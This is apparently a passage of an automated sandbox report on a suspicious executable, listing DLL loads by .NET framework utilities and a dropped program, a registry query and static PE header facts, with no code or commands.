Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: glog.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: boost_filesystem-mt-x64.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: webuid.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndcrashhandler.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndnetworking.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: d2d1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndnetworking.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndapplocations.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndfilesystem.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndos.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndexception.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: version.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndtime.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: cpr.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndfilesystem.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndexception.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndversion.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: version.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndhash.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndpointer.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: boost_filesystem-mt-x64.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: pKxhpP0spW.exe

Static PE information: More than 8191 > 100 exports found

Source: pKxhpP0spW.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: pKxhpP0spW.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: pKxhpP0spW.exe

Static file information: File size 64617520 > 1048576

Source: pKxhpP0spW.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10f7e00
Source: pKxhpP0spW.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xef8600

Source: pKxhpP0spW.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: pKxhpP0spW.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: pKxhpP0spW.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndPointer.pdb source: motor1.exe, 00000004.00000002.2548428390.00007FFDA5523000.00000002.00000001.01000000.00000016.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2605452248.00007FFDA4DA3000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndNetworking.pdb source: motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
